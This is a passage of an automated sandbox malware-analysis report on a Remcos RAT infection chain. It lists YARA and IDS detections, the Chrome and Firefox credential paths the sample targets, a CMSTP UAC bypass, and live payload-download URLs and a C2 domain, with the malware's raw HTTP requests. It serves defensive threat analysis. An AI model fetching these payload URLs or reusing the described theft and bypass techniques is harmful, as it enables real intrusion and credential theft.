Contains functionality to steal Chrome passwords or cookies

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\registros.dat, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

15_2_0040B21B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		15_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: \key3.db		15_2_0040B335

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0883UG

Contains functionality to launch a control a shell (cmd.exe)

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\registros.dat, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: cmd.exe

15_2_00405042

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.202.233.169	unknown	Russian Federation	9009	M247GB	true
185.166.143.49	bitbucket.org	Germany	16509	AMAZON-02US	false
190.9.223.135	remcosnov24.duckdns.org	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
52.217.196.57	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
s3-w.us-east-1.amazonaws.com	52.217.196.57	true
bitbucket.org	185.166.143.49	true
geoplugin.net	178.237.33.50	true
remcosnov24.duckdns.org	190.9.223.135	true
bbuseruploads.s3.amazonaws.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt	true	Avira URL Cloud: malware	unknown
remcosnov24.duckdns.org	true	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	false		high
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt	true	Avira URL Cloud: malware	unknown
https://bitbucket.org/hector4576--/noviembre19/downloads/sos19nov.txt	false		high

AV Detection

Antivirus detection for URL or domain

Source: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt	Avira URL Cloud: Label: malware
Source: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp

Multi AV Scanner detection for submitted file

Source: sostener.vbs

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\registros.dat, type: DROPPED

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

15_2_0043293A

Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_aa758384-0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00406764 _wcslen,CoGetObject,

15_2_00406764

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.196.57:443 -> 192.168.2.7:49747 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	15_2_0041B42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	15_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0044D5E9 FindFirstFileExA,	15_2_0044D5E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	15_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00406AC2 FindFirstFileW,FindNextFileW,	15_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	15_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	15_2_00418C69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	15_2_00408DA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

Suspicious execution chain found

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 00007FFAAC48AD53h		7_2_00007FFAAC48ACE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 00007FFAAC48D8A6h		7_2_00007FFAAC48D808

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49759 -> 190.9.223.135:4576
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 52.217.196.57:443 -> 192.168.2.7:49747
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 52.217.196.57:443 -> 192.168.2.7:49747
Source: Network traffic	Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 52.217.196.57:443 -> 192.168.2.7:49747
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 52.217.196.57:443 -> 192.168.2.7:49747

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: remcosnov24.duckdns.org

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp	String found in memory: Content-Security-Policy: connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io .ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in memory: connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io .ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-uri https://web-security-

Uses dynamic DNS services

Source: unknown

DNS query: name: remcosnov24.duckdns.org

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1

Yara detected Generic Downloader

Source: Yara match

File source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.7:49759 -> 190.9.223.135:4576

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /hector4576--/noviembre19/downloads/sos19nov.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNEU8mMXjgJqQ080SNiFV835eFr%2BbBRHNf7rm1neySGwglrM1o8LsYX0RovAU3W%2Bx4JB4pgdN4qsn1bW%2BfaD7XZjyLKF0JoYGK%2F0OwIw8v9GO6Ju75QefPFbX9xbLBwYMrmWW0lhQ%2B5mF%2BEx1g%3D%3D&Expires=1732092960 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 91.202.233.169 91.202.233.169
Source: Joe Sandbox View	IP Address: 185.166.143.49 185.166.143.49

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49769 -> 178.237.33.50:80

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.169

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004260F7 recv,

15_2_004260F7

Source: global traffic	HTTP traffic detected: GET /hector4576--/noviembre19/downloads/sos19nov.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNEU8mMXjgJqQ080SNiFV835eFr%2BbBRHNf7rm1neySGwglrM1o8LsYX0RovAU3W%2Bx4JB4pgdN4qsn1bW%2BfaD7XZjyLKF0JoYGK%2F0OwIw8v9GO6Ju75QefPFbX9xbLBwYMrmWW0lhQ%2B5mF%2BEx1g%3D%3D&Expires=1732092960 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AD/dll.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.202.233.169Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: remcosnov24.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.202.
Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.169
Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/A
Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt
Source: powershell.exe, 00000007.00000002.1425303708.0000025F0E6E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt
Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.202.H
